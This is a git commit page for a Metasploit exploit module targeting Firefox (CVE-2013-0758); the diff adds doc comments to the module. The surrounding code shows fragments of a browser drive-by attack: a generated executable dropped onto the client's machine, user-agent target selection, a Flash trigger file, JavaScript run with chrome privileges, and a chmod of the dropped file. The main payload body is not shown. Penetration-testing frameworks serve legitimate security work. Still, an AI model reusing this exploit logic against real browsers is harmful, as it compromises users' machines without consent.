Add some comments and clean some things up.

unstable
Joe Vennix 2013-05-21 14:00:45 -05:00
parent 978aafcb16
commit eaeb10742a
1 changed files with 9 additions and 0 deletions

View File

@ -100,10 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
handler(cli) handler(cli)
end end
# @return [String] the encoded executable for dropping onto the client's machine
def dropped_file_contents(cli) def dropped_file_contents(cli)
regenerate_payload(cli).encoded_exe() regenerate_payload(cli).encoded_exe()
end end
# @return [Msf::Module::Target] that matches the client's user-agent header
def get_target(agent) def get_target(agent)
# browser detection # browser detection
if agent !~ /firefox/i if agent !~ /firefox/i
@ -124,11 +126,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
# @return [String] the contents of the .swf file used to trigger the exploit
def flash_trigger def flash_trigger
swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf") swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf")
@flash_trigger ||= File.read(swf_path) @flash_trigger ||= File.read(swf_path)
end end
# @return [String] the filename that will be used when the payload is dropped
def payload_filename def payload_filename
if target.name == 'Windows x86 (Native Payload)' if target.name == 'Windows x86 (Native Payload)'
"#{Rex::Text.rand_text_alphanumeric(8)}.exe" "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
@ -137,6 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
# @return [String] containing javascript code to execute with chrome privileges
def js_payload def js_payload
%Q| %Q|
#{js_debug("Injection successful. JS executing with chrome privileges.")} #{js_debug("Injection successful. JS executing with chrome privileges.")}
@ -167,10 +172,13 @@ class Metasploit3 < Msf::Exploit::Remote
| |
end end
# @return [String] containing javascript that will alert a debug string
# if the DEBUG is set to true
def js_debug(str, quote="'") def js_debug(str, quote="'")
if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
end end
# @return [String] containing javascript that will chmod the dropped executable
def chmod_code def chmod_code
return '' if target.name == 'Windows x86 (Native Payload)' return '' if target.name == 'Windows x86 (Native Payload)'
%Q| %Q|
@ -189,6 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}" "#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
end end
# @return [String] HTML that is sent in the first response to the client
def generate_html def generate_html
vars = { vars = {
:symbol_id => 'a', :symbol_id => 'a',